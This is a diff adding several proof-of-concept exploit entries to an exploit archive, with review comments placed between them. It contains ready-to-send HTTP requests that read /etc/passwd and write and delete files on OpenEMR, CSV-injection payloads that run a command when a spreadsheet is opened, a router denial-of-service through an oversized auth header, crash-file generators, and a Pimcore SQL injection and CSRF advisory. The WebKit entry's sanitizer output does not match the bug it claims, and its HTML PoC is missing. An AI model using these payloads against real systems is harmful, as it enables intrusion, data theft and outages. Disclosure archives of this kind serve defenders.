diff --git a/exploits/hardware/dos/45203.txt b/exploits/hardware/dos/45203.txt
new file mode 100644
index 000000000..690bf1a29
--- /dev/null
+++ b/exploits/hardware/dos/45203.txt
@@ -0,0 +1,20 @@
+# Exploit Title: TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
+# Exploit Author: Aniket Dinda
+# Date: 2018-08-05
+# Vendor Homepage: https://www.tp-link.com/
+# Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
+# Version: TP-Link Wireless N Router WR840N
+# Firmware version : 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
+# Category: Hardware
+# Tested on: Windows 10
+# CVE: CVE-2018-15172
+
+# Proof Of Concept:
+
+1- First connect to this network
+2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
+3- Goto Quick setup >
+4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string.
+5- Now we paste a string consisting of 2000 zeros.
+6- Then forward the connection
+7- Then your router automatically logout and net connection will be gone.
\ No newline at end of file
diff --git a/exploits/linux/local/45205.txt b/exploits/linux/local/45205.txt
new file mode 100644
index 000000000..3b1808b57
--- /dev/null
+++ b/exploits/linux/local/45205.txt
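Review bot: The header of 45203.txt gives no exposure or recovery information, and step 3 is cut off at `Goto Quick setup >`, so a reader cannot judge the impact of CVE-2018-15172 from the entry alone. Step 1 implies the management interface is reached from the LAN side; the header should say so, and should say whether the router comes back by itself or needs a power cycle after the oversized `Authorization: Basic` value is sent. I would also add a line such as `# Fixed in: <firmware build, if any>` so it is clear whether Build 170608 is the only affected image.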
@@ -0,0 +1,58 @@ +# Exploit Title: WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC) +# Date: 2018-08-15 +# Exploit Author: PeregrineX +# Vendor Homepage: https://webkitgtk.org/ & https://webkit.org/wpe/ +# Software Link: https://webkitgtk.org/releases/ & https://wpewebkit.org/releases/ +# Version: <2.20.3 (GTK+) <2.20.1 (WPE) +# Tested on: WebKitGTK+ 2.20.2 +# CVE : CVE-2018-12293 + +# SUMMARY: +# getImageData() in ImageBufferCairo.cpp multiplies rect.width() * rect.height() * 4 +# without any overflow checks. If result is larger than UINT_MAX, +# heap-based buffer overflow via integer overflow will occur, +# which could be exploited further. + +# Works on WebKitGTK+ <2.20.3 and WPE WebKit <2.20.1 +# Credit to ADlab of Venustech for originally finding this vulnerability. + +Vulnerable Code (Source/WebCore/platform/graphics/cairo/ImageBufferCairo.cpp): + +template +RefPtr getImageData(const IntRect& rect, const IntRect& logicalRect, const ImageBufferData& data, const IntSize& size, const IntSize& logicalSize, float resolutionScale) +{ + auto result = Uint8ClampedArray::createUninitialized(rect.width() * rect.height() * 4); + if (!result) + return nullptr; +//... + +# Proof of Concept: + + + + + + No HTML5 canvas tag. 
+ + + +# Output snippet +UBSAN output: +../Source/JavaScriptCore/runtime/JSGlobalObject.cpp:1608:22: runtime error: +call to function (unknown) through pointer to incorrect function type +'JSC::RuntimeFlags (*)(const JSC::JSGlobalObject *)' +(/usr/local/lib/libwebkit2gtk-4.0.so.37+0x11116c70): note: (unknown) defined here +SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior +../Source/JavaScriptCore/runtime/JSObject.h:695:17 in +DerivedSources/JavaScriptCore/KeywordLookup.h:469:13: runtime error: +load of misaligned address 0x7fd8a1d95062 for type 'const uint32_t' +(aka 'const unsigned int'), which requires 4 byte alignment +0x7fd8a1d95062: note: pointer points here + 00 00 28 66 75 6e 63 74 69 6f 6e 20 28 74 68 69 73 56 61 6c 75 65 2c 20 61 72 67 75 6d 65 6e 74 + ^ \ No newline at end of file diff --git a/exploits/linux/webapps/45167.txt b/exploits/linux/webapps/45167.txt index 3130d8233..b94bfe23c 100644 --- a/exploits/linux/webapps/45167.txt +++ b/exploits/linux/webapps/45167.txt @@ -2,7 +2,7 @@ # Shodon Dork: iPECS CM # Exploit Author: Safak Aslan # Software Link: www.ipecs.com -# Version: 30M (System) +# Version: 30M-B.2Ia and 30M-2.3Gn # Authentication Required: No # Tested on: Linux # CVE: N/A diff --git a/exploits/linux/webapps/45202.txt b/exploits/linux/webapps/45202.txt new file mode 100644 index 000000000..0f4ce3b39 --- /dev/null +++ b/exploits/linux/webapps/45202.txt 
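Review bot: The sanitizer output under `# Output snippet` does not show the bug the summary describes: both UBSan reports (a function-type mismatch at JSGlobalObject.cpp:1608 and a misaligned load at KeywordLookup.h:469) are in JavaScriptCore, and neither mentions ImageBufferCairo.cpp or a heap write. A memory-error report pointing at the allocation in `getImageData()` is what a triager would need to confirm the entry. The title says 2.20.3 while `# Version:` says `<2.20.3` and the test ran on 2.20.2, so the title appears to name the fixed release rather than an affected one. The summary puts the limit at UINT_MAX, but `rect.width() * rect.height() * 4` is presumably evaluated in signed int, so the wrap likely happens earlier; either way the remedy worth stating is an overflow-checked product (WebKit's `Checked<unsigned, RecordOverflow>`) that returns nullptr before `createUninitialized` is called.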
@@ -0,0 +1,88 @@ +# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions +# Date: 2018-08-14 +# Exploit Author: Joshua Fam +# Twitter : @Insecurity +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz +# Version: < 5.0.1.3 +# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 +# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140 + +# 1.Arbitrary File Read: +# In OpenEmr a user that has access to the portal can send a malcious +# POST request to read arbitrary files. + +# i.Vulnerable Code: +# if ($_POST['mode'] == 'get') { +# echo file_get_contents($_POST['docid']); +# exit; +# } + +# ii. Proof of Concept: +POST /openemr/portal/import_template.php HTTP/1.1 +Host: hostname +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 26 + +mode=get&docid=/etc/passwd + +# 2.Arbitrary File Write: +# In OpenEmr a user that has access to the portal can send a malcious +# POST request to write arbitrary files. + +# i. Vulnerable Code: +# } else if ($_POST['mode'] == 'save') { +# file_put_contents($_POST['docid'], $_POST['content']); +# exit(true); +# } + +# ii. 
Proof of Concept: +POST /openemr/portal/import_template.php HTTP/1.1 +Host: hostname +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 54 + +mode=save&docid=payload.php&content= + +# After sending this navigate to payload.php at http://hostname/openemr/portal + +# 3. Arbitrary File Delete: +# In OpenEmr a user that has access to the portal can send a malcious +# POST request to delete a arbitrary file. + +# i. Vulnerable Code: +# } else if ($_POST['mode'] == 'delete') { +# unlink($_POST['docid']); +# exit(true); +# } + +# ii. Proof of Concept: +POST /openemr/portal/import_template.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 29 + +mode=delete&docid=payload.php + +# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page. \ No newline at end of file diff --git a/exploits/php/webapps/45206.txt b/exploits/php/webapps/45206.txt new file mode 100644 index 000000000..61af5dce0 --- /dev/null +++ b/exploits/php/webapps/45206.txt 
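Review bot: The header of 45202.txt is inconsistent about what is affected: the title and `# Tested on` say 5.0.1.3 while `# Version:` says `< 5.0.1.3`, and no fixed release is named. The three CVE ids sit on one line without saying which of read, write and delete each one covers, which makes the entry hard to match against scanner or advisory findings. All three quoted branches pass `$_POST['docid']` unchanged to `file_get_contents`, `file_put_contents` and `unlink`, so a remediation line would help defenders: reduce `docid` with `basename()` and reject any path whose `realpath()` falls outside the directory the templates are meant to live in. For detection, POSTs to `portal/import_template.php` whose `docid` contains `/` or `..` are worth alerting on.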
@@ -0,0 +1,34 @@ +# Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-08-14 +# Google Dork: N/A +# Vendor: Matt Cromwell +# Software Link: https://wordpress.org/plugins/export-users-to-csv/ +# Affected Version: 1.1.1 and before +# Active installations: +20,000 +# Patched Version: unpatched +# Category: Web Application +# Platform: PHP +# Tested on: Win10x64 + +# 1. Plugin Description: +# WordPress Export Users to CSV plugin exports user data and meta data. +# You can even export the users by role and registration date range. + +# 2. Technical Description: +# WordPress Export users to CSV plugin version 1.1.1. and before are affected by Remote Code Execution +# through the CSV injection vulnerability. This allows an application user to inject commands as part +# of the fields of his profile and these commands are executed when a user with greater privilege +# exports the data in CSV and opens that file on his machine. + +# 3. Proof Of Concept (PoC): +# Enter the payload =SUM(1+1)*cmd|' /C calc'!A0 in any field of the profile, for example, in biography. +# When the user with high privileges logs in to the application, export data in CSV and opens the +# generated file, the command is executed and the calculator will run open on the machine. + +# 4. Payloads: +=SUM(1+1)*cmd|' /C calc'!A0 ++SUM(1+1)*cmd|' /C calc'!A0 +-SUM(1+1)*cmd|' /C calc'!A0 +@SUM(1+1)*cmd|' /C calc'!A0 \ No newline at end of file diff --git a/exploits/php/webapps/45208.txt b/exploits/php/webapps/45208.txt new file mode 100644 index 000000000..1d0f6fca0 --- /dev/null +++ b/exploits/php/webapps/45208.txt 
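Review bot: Section 2 calls this Remote Code Execution, but what the entry demonstrates is formula injection: the command runs only if the exporting user opens the CSV in a spreadsheet program that still honours DDE and accepts its prompts, so the impact line overstates what the plugin alone allows. With `# Patched Version: unpatched`, the entry should carry the mitigation. The exporter has to neutralise any cell whose first character is `=`, `+`, `-` or `@` (prefix it with a single quote and quote the field), and administrators should open exports with automatic DDE and link updates disabled.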
@@ -0,0 +1,215 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180813-0 > +======================================================================= + title: SQL Injection, XSS & CSRF vulnerabilities + product: Pimcore + vulnerable version: 5.2.3 and below + fixed version: 5.3.0 + CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059 + impact: High + homepage: https://pimcore.com/en + found: 2018-06-11 + by: T. Silpavarangkura (Office Bangkok) + N. Rai-Ngoen (Office Bangkok) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"Pimcore is an award-winning consolidated open source enterprise platform for +master data management (PIM/MDM), user experience management (CMS/UX), digital +asset management (DAM) and eCommerce." + +Source: https://pimcore.com/en + + +Business recommendation: +------------------------ +The vendor provides a patch for most identified issues, but XSS will not be fixed +according to the vendor. + +An in-depth security analysis performed by security professionals is highly +advised, as the software may be affected from further security issues. + + +Vulnerability overview/description: +----------------------------------- +1. SQL Injection (CVE-2018-14058) +Multiple SQL injection vulnerabilities have been identified in the REST web +service API. An attacker who obtains a valid API key that is granted a +necessary permission could successfully perform an attack to extract +information from the database. + +2. Stored Cross-site Scripting (CVE-2018-14059) +Multiple stored cross-site scripting vulnerabilities have been identified +across multiple functions in the application, which allows an authenticated +attacker to insert arbitrary JavaScript code in virtually all text fields and +data entries in the application. + +3. 
Cross-site Request Forgery (CVE-2018-14057) +Multiple functions in the application are not protected by the existing +anti-CSRF token, which allows an attacker to perform a cross-site request +forgery attack to at least add, update or delete entries, among other actions. + + +Proof of concept: +----------------- +1. SQL Injection (CVE-2018-14058) +The following URLs demonstrate the issue: +http:///webservice/rest/asset-count?apikey=[...]&condition= +http:///webservice/rest/asset-inquire?apikey=[...]&id= +http:///webservice/rest/asset-list?apikey=[...]&condition= +http:///webservice/rest/document-count?apikey=[...]&condition= +http:///webservice/rest/document-inquire?apikey=[...]&id= +http:///webservice/rest/document-list?apikey=[...]&condition= +http:///webservice/rest/object-count?apikey=[...]&condition= +http:///webservice/rest/object-inquire?apikey=[...]&id= +http:///webservice/rest/object-list?apikey=[...]&condition= + +Note that a valid API key that is granted at least either "Assets", "Documents" +or "Objects" permission is required to perform an SQL injection attack against +associated API endpoints successfully. + + +2. Stored Cross-site Scripting (CVE-2018-14059) +Most of the text fields in pop-up dialogs and data entries in the application +are vulnerable to the cross-site scripting vulnerability, which can be +exploited by an authenticated attacker. For example, the attacker could insert +an attack payload while performing at least the following actions: + +1) Edit a user account's first name/last name/e-mail address. +2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/ +Quantity Value/Static Routes entry value in the table. +3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/ +Field-Collections/Objectbrick/Classification Store item. 
+ + +The vendor stated that many identified XSS issues only affect administrative +functions and hence the issues will not be fixed: +"They are only affecting administrative functionalities (higher privileges +required) - so this isn't used by non-trusted users - a check just adds +additional overhead without any benefits for security." + +SEC Consult argued multiple times that XSS can still be exploited e.g. when a +higher privileged user gets attacked and the issues should be fixed nevertheless. + + +3. Cross-site Request Forgery (CVE-2018-14057) +The existing anti-CSRF token in the HTTP request header named +"X-pimcore-csrf-token" was found to be validated only in the "Settings > +Users / Roles" function. Therefore, an attacker could perform a cross-site +request forgery attack against virtually all other functions in order to +at least add, update and delete data without having to submit the anti-CSRF +token. + +The non-exhaustive list of affected requests are listed below: +POST /admin/asset/add-asset +POST /admin/asset/add-asset-compatibility +GET /admin/asset/delete +GET /admin/asset/import-server +GET /admin/asset/import-server-files +GET /admin/asset/import-url +POST /admin/asset/import-zip +POST /admin/asset/update +GET /admin/document/add +GET /admin/document/delete +POST /admin/document/doc-types +POST /admin/email/blacklist +POST /admin/email/email-logs +POST /admin/email/save +POST /admin/hardlink/save +POST /admin/link/save +POST /admin/newsletter/save +GET /admin/object/add +POST /admin/object/save +GET /admin/object/delete +POST /admin/page/save +POST /admin/settings/metadata +POST /admin/settings/properties +POST /admin/settings/set-system +POST /admin/settings/website-settings +POST /admin/snippet/save + + +Vulnerable / tested versions: +----------------------------- +The vulnerabilities have been identified in Pimcore version 5.2.3 which was the +most current version at the time of discovery. 
+ + +Vendor contact timeline: +------------------------ +2018-06-15: Contacting vendor through +https://pimcorehq.wufoo.com/forms/pimcore-security-report +2018-06-18: Vendor provides the fixes of SQL injection and CSRF in the nightly + build, but has a problem of reproducing the XSS. +2018-06-18: Contacting vendor to request for a secure channel to provide + further details of the XSS. +2018-06-18: Sending the details of the XSS. +2018-06-19: Vendor fixes the SQL injection and only fixes the XSS partially. +2018-06-20: Notifying vendor, that SQL injection and XSS are not properly fixed +2018-06-20: Vendor inquires more details about the XSS. +2018-06-21: Explaining vendor the XSS issues and notifying vendor that the CSRF + has been fixed. +2018-06-21: Vendor will discuss the open issues internally. +2018-07-11: Following up vendor regarding the fixes of the open issues. +2018-07-11: Vendor completely fixes the SQL injection, but decides not to fix + the XSS in the administrative functions, patch release is planned + within the next two weeks +2018-07-20: Vendor provides a patched version +2018-08-13: Public release of security advisory + + +Solution: +--------- +The vendor has published a new release (version 5.3.0) which fixes most of the +identified issues, but not the XSS issues that affect administrative functions: + +https://pimcore.com/en/download + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. 
The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF Thongchai Silpavarangkura / @2018 \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45204.py b/exploits/windows_x86-64/dos/45204.py new file mode 100755 index 000000000..73960e85d --- /dev/null +++ b/exploits/windows_x86-64/dos/45204.py 
@@ -0,0 +1,26 @@
+# Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-16
+# Homepage: https://www.ambientweather.com
+# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe
+# Tested Version: 1.4.0.1
+# Tested on OS: Windows 10
+
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Now click "Okay" and in the new window paste the content of
+# "exploit.txt" into the following fields:"IP". Click "Search" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 2000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45207.py b/exploits/windows_x86-64/dos/45207.py
new file mode 100755
index 000000000..6be674d62
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45207.py
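Review bot: The script body in 45204.py is Python 2 only and hides its own errors: `print "..."` is a statement, and the bare `except:` reports every failure, including a typo in the block, as `File cannot be created`. I would write `with open("exploit.txt", "w") as f:` so the handle is closed on a failed write, catch `IOError as e` and print `e`, and use `print(...)` calls. The `#!/usr/bin/python` line sits below the header comments, where it is only an ordinary comment; the file is added with mode 100755, so it should be line 1 or be removed. The same points apply to exploits/windows_x86-64/dos/45207.py, whose body is identical.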
@@ -0,0 +1,25 @@
+# Exploit Title: Central Management Software v1.4.13 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-16
+# Homepage: https://www.ambientweather.com
+# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/Manuals/ambientcam/04_central_management_software.zip
+# Tested Version: 1.4.13
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the CMS client program. In the new window paste the content of
+# "exploit.txt" into the following fields:"Password". Click "Login" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 2000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c4f621de8..e6d2acaa1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6046,6 +6046,9 @@ id,file,description,date,author,type,platform,port 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware, 45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86, 45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware, +45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware, +45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64, +45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -9873,6 +9876,7 @@ id,file,description,date,author,type,platform,port 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux, 45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android, 45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64, +45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -39799,4 +39803,7 @@ id,file,description,date,author,type,platform,port 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux, 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848 45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001 +45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux, 45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware, +45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php, +45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80